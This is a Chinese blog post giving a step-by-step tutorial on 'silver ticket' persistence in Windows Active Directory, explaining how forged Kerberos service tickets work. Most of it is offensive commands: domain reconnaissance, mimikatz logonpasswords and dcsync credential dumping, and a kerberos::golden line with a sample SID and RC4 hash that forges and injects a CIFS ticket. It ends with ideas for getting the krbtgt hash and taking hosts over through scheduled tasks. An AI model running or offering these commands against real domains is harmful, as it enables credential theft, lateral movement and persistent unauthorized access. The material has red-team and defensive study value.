首页 > 其他分享 >白银票据权限维持

白银票据权限维持

时间:2023-06-19 14:24:32浏览次数:47  
标签:shell 服务 账号 mimikatz 白银 票据 权限

白银票据权限维持

目录

一、服务账号介绍

服务账号就是计算机名字+$用来管理服务的账号

二、白银票据原理

如果说黄金票据是伪造的TGT,那么白银票据就是伪造的ST。 在Kerberos认证的第5步,Client带着ST和Authenticator3向Server上的某个服务进行请求,Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问 server上的指定服务了。所以我们只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,但是伪造的门票只对部分服务起作用。

三、实验前提

已经控制了域名并且使用域管理员登录或者提权的system。

条件如下:

1.域名
2.域sid
3.目标服务器名
4.可利用的服务
5.服务账号的NTML哈希
6.需要伪造的用户名(这个可以随意)

四、实验步骤

1、获取关键信息

shell whoami /user 获取域名和SID
shell net config workstation 获取完整域名
shell wmic useraccount list brief 获取域名和SID
shell net time /domain 获取域主机名

2、获取服务账号的NTLM哈希值

mimikatz sekurlsa::logonpasswords
mimikatz lsadump::dcsync /domain:candada.com /user:DC$(主机名$)

3、伪造票据

mimikatz kerberos::tgt 查票
mimikatz kerberos::purge 清票
shell klist 查票
shell klist purge 清票
mimikatz kerberos::golden /domain:candada.com /sid:S-1-5-21-3368079911-2200516951-1212899923 /target:DC.candada.com /service:cifs /rc4:3a67aaaf095a99cbebd4e8d91d1ba46f /user:test /ptt

4、利用思路:

(1)可以利用ldap服务去获取krbtgt的NTLM哈希,利用黄金票据+计划任务上线

(2)可以利用cifs服务+host服务+计划任务上线

标签:shell,服务,账号,mimikatz,白银,票据,权限
From: https://www.cnblogs.com/candada/p/17491028.html

相关文章

  • 一个用户创建引发的权限控制问题
    昨天开发同学提了一个需求,比较有意思。需求描述:要求开发库创建一个新用户A(默认表空间TBS_1),由于这库是共享库,还有其他schema(示例:表空间TBS_2)被其他组的开发人员使用,需要避免使用A用户的开发人员,利用createtablet(colname)tablespacetbs_2通过指定表空间的方式在tbs_2上创建......
  • Pixel 2XL线刷-获取Root权限
    转载于:https://www.cnblogs.com/liuqingzheng/p/17462127.html一什么是线刷,什么是卡刷#线刷(通过连接计算机进行刷机):factory完整包,可以降级线刷是指使用计算机通过USB连接将刷机文件传输到设备上,并通过命令行工具(如ADB和Fastboot)执行刷机操作的方式。在线刷过程中,设备进入Fas......
  • Pixel2XL解锁BL-刷入Twrp-获取Root权限
    转载于:https://www.cnblogs.com/liuqingzheng/p/17462146.html 前提:手机账号退出,不插卡,不联网,删除pin指纹以及开机密码一解锁BL(如已解锁,该步骤不需要)1.1bootloader是什么?bootloader,中文翻译为启动引导程序。打个比方来说,当我们启动手机的时候,最先开始执行的就是这段程......
  • RBAC实战-配置用户操作集群权限(二)
    生成私钥cd/etc/kubernetes/pki(umask077;opensslgenrsa-outlucky.key2048)生成证书请求opensslreq-new-keylucky.key-outlucky.csr-subj"/CN=lucky"生成luckyca证书,获取APIServer信任opensslx509-req-inlucky.csr-CAca.crt-CAkeyca.key-CAcreatese......
  • Oracel 创建表空间、创建用户并设置密码及制定表空间、分配权限、创建角色、角色授权
    select*fromdba_data_files;select*fromdba_users;--删除用户--DROPUSERSYNC_PLUS_1cascade;--删除表空间--droptablespaceSYNC_PLUS_ORCLPDB1includingcontentsanddatafiles;/*createtablespacesync_plus_1datafile'F:\DB_FILES\ORAC......
  • Windows提权到system权限
    提权到ntauthority\system权限:1.在PowerShell下运行p.ps1脚本2.运行如下命令:[MyProcess]::CreateProcessFromParent(1580,"c:\windows\system32\cmd.exe","")3.在新打开的窗口中运行whoami,可以看到当前账户为ntauthority\system4.然后可以重启schedule服务scstopschedule&......
  • Pixel2XL解锁BL-刷入Twrp-获取Root权限
    Pixel2XL解锁BL-刷入Twrp-获取Root权限前提:手机账号退出,不插卡,不联网,删除pin指纹以及开机密码【一】解锁BL(如已解锁,该步骤不需要)(1)bootloader是什么?bootloader中文翻译为启动引导程序。打个比方来说,当我们启动手机的时候,最先开始执行的就是这段程序,然后对手机进行一些......
  • Pixel 2XL线刷-获取Root权限
    Pixel2XL线刷-获取Root权限【一】什么是线刷,什么是卡刷(1)什么是线刷线刷(通过连接计算机进行刷机):factory完整包,可以降级线刷是指使用计算机通过USB连接将刷机文件传输到设备上,并通过命令行工具(如ADB和Fastboot)执行刷机操作的方式。在线刷过程中,设备进入Fastboot模式,通过F......
  • 数据权限
    本文源码地址GiteeGitHub后端https://gitee.com/linjiabin100/pi-admin.githttps://github.com/zengpi/pi-admin.git前端https://gitee.com/linjiabin100/pi-admin-web.githttps://github.com/zengpi/pi-admin-web.git数据行级权限是指不同的用户只能访问......
  • 2022年 12 月 Tita 升级|管理员权限全新升级!
    升级快速一览:·【管理员授权】全新的「权限组」授权模式,支持定制更复杂的管理角色·【系统影响】精准定位管理范围与权限,满足企业管理需求点击免费领取绩效考核模版等资料升级详情一、管理员授权页面升级,全新的「权限组」授权模式,支持企业灵活自定的管理角色界面改动......